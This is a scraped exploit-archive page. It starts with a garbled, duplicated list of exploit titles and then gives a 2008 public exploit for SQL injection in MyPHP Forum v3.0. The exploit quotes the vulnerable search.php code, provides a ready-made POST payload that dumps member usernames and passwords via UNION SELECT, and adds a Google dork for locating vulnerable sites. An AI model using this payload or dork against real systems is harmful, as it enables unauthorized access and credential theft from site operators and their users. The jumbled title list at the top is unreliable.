
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
122 lines
6.9 KiB
Text
Executable file
122 lines
6.9 KiB
Text
Executable file
#=================================================================================================#
|
|
# ____ __________ __ ____ __ #
|
|
# /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ #
|
|
# | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ #
|
|
# | | | \ | |/ \ \___| | /_____/ | || | #
|
|
# |___|___| /\__| /______ /\___ >__| |___||__| #
|
|
# \/\______| \/ \/ #
|
|
#=================================================================================================#
|
|
# This is a Public Exploit. #
|
|
# Date: 03/01/2008 [dd,mm,yyyy] #
|
|
# #
|
|
# !!!Happy New Year!!! #
|
|
# #
|
|
#=================================================================================================#
|
|
# MyPHP Forum v3.0 (Final) And Maybe Lower Multiple Sql Injection Vulnerabilities (Mq=Off/On) #
|
|
# #
|
|
# Vendor: www.myphp.ws #
|
|
# Severity: Highest #
|
|
# Author: The:Paradox #
|
|
# #
|
|
#=================================================================================================#
|
|
# Proud To Be Italian. #
|
|
#=================================================================================================#
|
|
"""
|
|
Related Codes:
|
|
search.php; line 14:
|
|
|
|
if($_POST['submit']) {
|
|
$searchtext = $_POST['searchtext'];
|
|
$searchuser = $_POST['searchuser'];
|
|
|
|
if(!strstr($searchtext, '"')) {
|
|
$keywords = explode(" ", $searchtext);
|
|
for($i = 0; $i < count($keywords); $i++) {
|
|
if($sqladdon != "") {
|
|
$sqladdon .= " AND p.message LIKE '%$keywords[$i]%'";
|
|
} else {
|
|
$sqladdon .= "p.message LIKE '%$keywords[$i]%'";
|
|
}
|
|
}
|
|
} else {
|
|
$phrase = trim(stripslashes(strstr($searchtext, '"')));
|
|
$quotesarr = explode('"', $phrase);
|
|
$quotes = count($quotesarr);
|
|
$phrasecount = $quotes - (count(explode('" "', $phrase)) + 1);
|
|
|
|
for($i = 0; $i < $quotes; $i++) {
|
|
if($i != 0 && $i != $quotes - 1) {
|
|
if($phraseoff != "yes") {
|
|
$phraselist .= "$quotesarr[$i]|";
|
|
$phraseoff = "yes";
|
|
} else {
|
|
$phraseoff = "no";
|
|
}
|
|
}
|
|
}
|
|
|
|
$phrasearr = explode("|", $phraselist);
|
|
$phrases = count($phrasearr) - 1;
|
|
|
|
for($i = 0; $i < $phrases; $i++) {
|
|
if($sqladdon != "") {
|
|
$sqladdon .= " AND p.message LIKE '%$phrasearr[$i]%'";
|
|
} else {
|
|
$sqladdon .= "p.message LIKE '%$phrasearr[$i]%'";
|
|
}
|
|
}
|
|
|
|
$newsearchtxt = trim(str_replace("$phrase", "", stripslashes($searchtext)));
|
|
|
|
if($newsearchtxt != "") {
|
|
$keywords = explode(" ", $newsearchtxt);
|
|
}
|
|
|
|
for($i = 0; $i < count($keywords); $i++) {
|
|
if($sqladdon != "") {
|
|
$sqladdon .= " AND p.message LIKE '%$keywords[$i]%'";
|
|
} else {
|
|
$sqladdon .= "p.message LIKE '%$keywords[$i]%'";
|
|
}
|
|
}
|
|
}
|
|
|
|
if($searchuser != "") {
|
|
if($sqladdon != "") {
|
|
$sqladdon .= " AND p.author LIKE '%$searchuser%'";
|
|
} else {
|
|
$sqladdon .= "p.author LIKE '%$searchuser%'";
|
|
}
|
|
}
|
|
|
|
if($sqladdon != "" ) {
|
|
search_header();
|
|
$ttnum = 1; // Now the Vulnerable Query =)
|
|
$query = mysql_query("SELECT t.*, f.name AS forum FROM $db_post p, $db_topic t, $db_forum f WHERE $sqladdon AND t.tid=p.tid AND f.fid=t.fid") or die(mysql_error());
|
|
|
|
"""
|
|
#=================================================================================================#
|
|
# Proof Of Concept / Bug Explanation: #
|
|
# #
|
|
# A lot of Sql injection Vulnerabilities were found in this platform, but most of them work only #
|
|
# with the server configuration Magic Quotes Off. #
|
|
# Whatever in Search.php there is a $searchtext is not propelly checked before the mysql_query. #
|
|
# The page does stripslashes to $searchtext var making us able to do an Sql injection with the #
|
|
# configuration of Magic Quotes On. #
|
|
# #
|
|
#=================================================================================================#
|
|
# Post Query :
|
|
#
|
|
# submit=Search&searchtext=%'/**/UNION/**/SELECT/**/0,0,0,concat('<BR/><h3>-=ParadoxGotThisOne=-</h3><BR/><h4>Username:',username,'<BR/>Password:',password,'</h4>'),0,0,0,0,0,0/**/FROM/**/[Prefix]_member/**/WHERE/**/uid=[Id]/*"
|
|
#
|
|
# Attenction: the last " is needed (see code).
|
|
#
|
|
#=================================================================================================#
|
|
# Other injection vulnerabilities were found, but them were not pulished. #
|
|
#=================================================================================================#
|
|
# Google Dork=> Powered by MyPHP Forum v3.0 #
|
|
#=================================================================================================#
|
|
# Use this at your own risk. You are responsible for your own deeds. #
|
|
#=================================================================================================#
|
|
|
|
# milw0rm.com [2008-01-03]
|